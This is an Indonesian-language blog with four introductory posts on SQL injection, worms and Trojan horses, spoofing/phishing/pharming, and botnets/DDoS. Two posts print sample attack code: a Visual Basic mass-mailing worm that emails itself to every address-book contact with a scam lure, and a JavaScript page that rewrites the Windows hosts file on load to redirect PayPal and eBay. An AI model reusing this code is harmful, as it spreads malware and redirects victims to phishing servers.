RandomBlogger

Monday, 31 October 2016

SQL Injection | Penjelasan

SQL Injection

SQL Injection adalah teknik yang digunakan untuk mengambil keuntungan dari input yang dimasukkan melalui aplikasi web, yang biasanya setelah input dimasukkan, program akan mengeksekusi perintah SQL untuk melakukan pengecekan di dalam database yang ada di web server.

SQL Injection termasuk salah satu teknik hacking dasar yang umumnya digunakan oleh hacker. Hal ini memungkinkan user untuk melewati perintah SQL ke dalam database ketika ada di bagian program yang mempunyai celah.


SQL Injection memungkinkan user mengakses dan memanipulasi database dan tabel yang berkaitan dengan web. Caranya adalah menggunakan perintah SQL untuk memotong perintah SQL sendiri langsung ke server yang kemudian perintah SQL "ilegal" akan diperlakukan sebagai perintah SQL yang legal dan di eksekusi.

Database mungkin tidak akan mengidentifikasi perintah SQL yang dimasukkan sebagai sesuatu yang berbahaya, karena mengandung perintah SQL yang normal yang digunakan oleh web untuk mendapatkan informasi dari database nya.

Contoh yang sederhana adalah ketika user menggunakan teknik ini untuk mendapatkan informasi login. Ketika user yang sah mengetikkan username dan passwordnya, sebuah perintah SQL akan dijalankan untuk memvalidasi masukan dari user tersebut.

Dengan SQL Injection, hacker atau cracker bisa menggunakan perintah SQL khusus yang dapat digunakan untuk melihat isi dari database, yang karenanya dapat digunakan juga untuk melihat username dan password di dalam database. Namun, ini hanya bisa dilakukan jika SQL dikirimkan ke sebuah website yang kurang terproteksi.


Sekian pembahasan saya tentang SQL Injection pada hari ini semoga penjelasan yang saya berikan bermanfaat untuk pembaca setia blog saya....
Terima kasih sudah mengunjungi blog ini ~Bye Bye~ :D :D
Read More »

Thursday, 27 October 2016

Worm Dan Trojan Horse | Pengertian

Worm

Worm adalah program perangkat lunak berbahaya yang mampu mereplikasi disi. Berbeda dengan virus, program ini tidak perlu memasukkan dirinya ke program yang sudah ada atau memerlukan intervensi manual untuk menyebar. Worm menggunakan jaringan untuk mengirim salinan dirinya ke komputer ain pada jaringan yang sama.

Berikut adalah satu contoh program worm sederhana yang dibuat menggunakan Visual Basic :

Private Form Sub_Load()
Me.hide
Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\Brosur.exe"
Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\Sayembara.exe"
Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\Pemenang.exe"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressList(1).AddressEntries(x)
Mail.Subject = "Fwd:None"
Mail.Body = "Selamat anda memenangkan hadiah utama dari sayembara minuman basi berupa paket wisata untuk diri sendiri ke Neraka, tiket dan akomodasi ditanggung. Untuk informasi selengkapnya, silahkan download brosur terlampir"
Mail.Attachmnents.Add = "C:\Brosur.exe"
Mail.Send
Next
ol.Quit
End Sub

Program worm tersebut ketika dijalankan akan menduplikasi dirinya, membaca alamat email yang tersimpan di address book komputer client dan mengirimkan sebuah pesan, yang mana bisa kita ubah sesuka hati kita, dan meng-attach file yang sudah diduplikasi ke badan email. Nah, sudah lengkaplah persyaratan untuk sebuah program dapat disebut sebagai worm, yaitu bisa menyebar melalui jaringan.


Trojan Horse

Jika pembaca pernah mendengar tentang perang Troya, dalam mitologi Yunani, perang Troya terjadi karena penyerbuan terhadap kota Troya yang terletak di Asia kecil, oleh pasukan Akhaia (Yunani).

Peristiwa ini terjadi karena Paris menculik Helene dari suaminya Menelaos, raja Sparta. Yang menarik di kisah ini adalah munculnya patung kuda taksasa yang awalnya dianggap sebagai simbol kemenangan bagi rakyat Troya, ternyata berbalik menjadi mimpi buruk terbesar, karena didalam patung kuda raksasa tersebut, pasukan Yunani terpilih sudah bersembunyi dan keluar pada saat yang tepat, membuka gerbang Troya, sehingga seluruh pasukan bisa menyerbu masuk dan mengakibatkan jatuhnya kota tersebut.

Dalam dunia komputer, program Trojan Horse adalah sebuah program yang bersembunyi didalam program lainnya. Hampir semua program Trojan memiliki dampak dan merugikan komputer. Biasanya program Trojan bersembunyi dalam program lain yang menarik, misalnya Games. Dan user baru menyadari adanya program ini setelah komputernya mengalami kerusakan. 

Karena program Trojan ini hampir selalu konotasinya negatif, saya pikir tidak akan memberikan contoh programnya disini, karena sepanjang sepengetahuan saya, hampir tidak ada program Trojan yang dibuat untuk maksud baik.

Cukuplah kita tahu bahwa ada program yang sengaja dikemas didalam program lain, yang memang dimaksudkan untuk sembunyi sampai pada waktunya tiba. Beberapa orang mengatakan Trojan ini seperti bom waktu, dimana saat dia muncul dan menimbulkan dampak yang tidak diinginkan, saat itu kita sudah terlambat menyadarinya.



Sekian penjelasan saya mengenai Program Worm dan Trojan Horse. Smoga dapat menambah wawasan kalian tentang virus dan program berbahaya.
Terimakasih sudah mengunjungi Blog saya Bye Bye.

Read More »

Saturday, 22 October 2016

Spoofing, Phising, dan Pharming | Pengertian | Penjelasan

 Phishing

Spoofing, Phising, dan Pharming

Lihat lah definisi masing-masing istilah berikut :
  • Spoofing
adalah serangan dimana sebuah program disamarkan seperti program yang lain. Yang paling umum adalah meng-clone URL atau situs web (Lihat definisi phishing).

  • Phishing (dari kata "fishing/memancing")
adalah bentuk umum dari Spoofing, dimana halaman web palsu dibikin seolah-olah terlihat seperti halaman web yang asli. Halaman palsu diletakkan di server yang berada di bawah kendali sang penjahat.                                                                                                                                                     
Penjahat mencoba untuk mengelabui pengguna untuk berpikir bahwa mereka terhubung ke situs yang benar, dimana kemudian username, password, rincian kartu kredit dan informasi sensitif  lainnya dapat diperoleh dengan mudah. eBay, PayPal dan bank online adalah terget umum Phising.

Phishing biasanya dilakukan melalui email atau pesan instan. Pesan email mengaku dari sumber yang sah, tapi ketika pengguna mengklik link yang diberikan, ia diarahkan ke halaman web palsu.

  • Pharming (dari kata "farming/pertanian")
adalah sebuah serangan dimana seorang peretas mencoba untuk mengarahkan sebuah situs web ke situs yang palsu dengan cara mengubah host file di komputer korban atau dengan eksploitasi kerentanan dalam perangkat lunak DNS server. DNS ini bertugas untuk menerjemahkan sebuah domain ke alamat IP yang sesungguhnya di Internet.

Phising, yaitu menipu korban dengan teknik Social Engineering agar korban masuk ke halaman situs palsi, yang seolah-olah mirip dengan aslinya.

Tanpa kita sadari, kita sering kali menerima telpon maupun sms yang menyatakan bahwa kita memenangkan sebuah hadiah. Ini adalah salah satu bentuk Social Engineering yang akan mengiring kita ke halaman web palsu, dimana jika kita lengah, kita akan menjadi salah satu korbannya.

Tujuan dari si pengirim sebenarnya adalah mendapatkan username dan password kita yang nantinya dapat digunakan olehnya unutk login seolah-olah yang login adalah kita.
salah satu contoh bentuk phishing.
Atau umumnya dengan meniru persis halaman login sebuah website. 
 Phishing

Sebaiknya kita berhati-hati sebelum melakukan transaksi online, karena kejahatan phishing ini semakin marak terjadi, karena untuk melakukannya dibutuhkan satu keahlian khusus, seperti harus menguasai bahasa pemrogramman tertentu.

Lain halnya dengan Pharming, membutuhkan sedikit pengetahuan scripting yang lebih lanjut. Secara singkat, Pharming mengutak-atik file host yang ada di sistem Windows. Host file di Windows XP berada di: C:\WINDOWS\system32\Drivers\etc\hosts

Dengan Javascript, kita dapat membuat sebuah script sederhana sebagai berikut:

<html>
<head>
<script language="javascript">
function pharmer(){
var fso = new ActiveXObject("Scripting.FileSystemObject");
var pharm = fso.CreateTextFile("C:\WINDOWS\system32\Drivers\etc\hosts
", true);
pharm.WriteLine('127.0.0.1 localhost');
pharm.WriteLine('188.222.33.1 paypal');
pharm.WriteLine('188.222.33.1 www.paypal,com');
pharm.WriteLine('188.222.33.1 ebay.com');
pharm.WriteLine('188.222.33.1 www.ebay.com');
pharm.Close();
}
</script>
</head>
<body onLoad="pharmer()">
</body>
</html>

Oleh beberapa orang, trik ini bisa digunakan untuk melakukan pemblokiran terhadap beberapa situs tertentu. Dengan teknik Social Engineering, file aplikasi bisa masuk ke komputer target dan menimpa file host ini, sehingga akses ke sebuah situs tidak dapat dilakukan.

Saya sendiri pernah mencoba di Windows 7 dan ternyata masih bisa. Sementara di sistem operasi Linux, file host ini terletak di direktori /etc/hosts. Sedangkan di sistem operasi Mac, lokasinya ada di direktori /private/etc/hosts, sehingga jika kita ingin mengedit harus melalui terminal prompt dengan mengetikkan perintah sudo nano /private/etc/hosts.

Sekian penjelasan saya kali ini mengenai Spoofing, Phishing, dan Pharming. Smoga informasi yang saya berikan bermanfaat :). Terima kasih telah mengunjungi Blog saya Bye Bye.


Read More »

Distributed Denial-of-Service (DDos) dan Botnet | Penjelasan

Botnet Dan Distributed Denial-of-Service(DDoS)

Sebuah Botnet (biasa disebut "Pasukan Zombie") adalah kumpulan robot perangkat lunak, atau biasa disebut bots, yang menjalankan serangkaian instruksi otomatis melalui Internet.

Istilah "Botnet" umumnya digunakan unutk merujuk ke suatu jaringan yang terdiri dari ratusan hingga ribuan komputer yang saling bekerja sama satu dengan lainnya (Disebut "Komputer zombie"). "Zombie" ini biasanya menjalankan program-program seperti worm,  trojan horse, atau backdoors.

Botnet sering digunakan untuk meluncurkan serangan Distributed Denial-of-Service (DDoS) terhadap sebuah situs. Bot yang terbaru secara otomatis dapat memindai lingkungannya dan meyebar diri dengan memanfaatkan celah dalam sisi security dan password yang lemah. Illustrasi dapat dilihat pada gambar dibawah ini.
 DDoS attack
Saya akan memberikan gambaran yang paling sederhana saja yaitu DoS (Denial of Service). Serangan DoS pada hakekatnya adalah memberikan perintah secara terus menerus terhadap satu target server sampai server tersebut menjadi hang atau down. Jadi, bahkan hanya dengan perintah ping yang sederhana,kita bisa membuat sebuah serangan terhadap server dengan membuatnya sibuk, karena instruksi ping akan dikerjakan secara terus-menerus.

Mengingat dampak yang ditimbulkanya cukup signifikan, saya tidak akan membahas lebih tentang serangan DoS ini. Lalu pertanyaannya sekarang, adakah cara yang efektif untuk menanggulangi serangan Dos? Sepanjang pengetahuan saya, tidak ada cara yang benar-benar efektif untuk menangkal serangan DoS selama server kita masih terkoneksi online ke internet. Hal yang mungkin bisa dilakukan adalah mengidentifikasi klien dan apabila request berasal dari klien yang sama, request tersebut dapat di blok.

Ada beberapa metode yang dapat kita gunakan untuk mengidentifikasi client. Berikut adalah pembahasannya disertai kelebihan dan kekurangan masing-masing metode

  • Cookies 
Menetapkan cookie pada client untuk mengidentifikasi user.


Kelebihan : pasti unik per sesi.

Kekurangan : mudah untuk dihapus (bahkan untuk orang-orang dengan pengetahuan teknis yang terbatas), hanya berlaku untuk satu browser, mudah dibuatkan script sederhana untuk mem-bypasss cookies.

  • IP Address
Menggunakan alamat IP user untuk mengidentifikasi user.

Kelebihan : perubahan IP sangat jarang terjadi, dapat bekerja di beberapa browser sekaligus, dan tidak semua orang bisa menyamarkan IP nya, misalnya dengan memanfaatkan IP Proxy Server.

Kekurangan : belum tentu unik. Satu alamat IP dapat dengan mudah digunakan unutk beberapa client, dan untuk beberapa ISP alamat IP user ini bisa di ubah-ubah.

  • Browser fingerprinting.
Menggunakan semua data browser dikirim ke server (bukan hanya data user, tetapi juga OS  yang di gunakan, resolusi layar, dan hal lainnya) untuk menghasilkan informasi yang unik.

Kelebihan : sangat besar kemungkinannya data yang dikirim benar-benar unik (mengubah alamat IP atau membersihkan cookie tidak akan bisa mengubah informasi tersebut).

Kekurangan : mungkin atau bahkan terlalu unik, sehingga perubahan yang terjadi pada browser akan berakibat informasi ini bisa di bypass oleh script.

Sekian penjelasan dari saya mengenai Botnet dan DDos (Distributed Denial-of-Service) pada hari ini smoga informasi yang saya berikan bermanfaat :).
Trima kasih sudah membaca dan mengunjungi blog saya Bye Bye.

Quote Of Today : "Jangan pantang menyerah untuk menggapai yang kau ingin kan karna menyerah adalah Ibu dari Kegagalan" - VendettaId






Read More »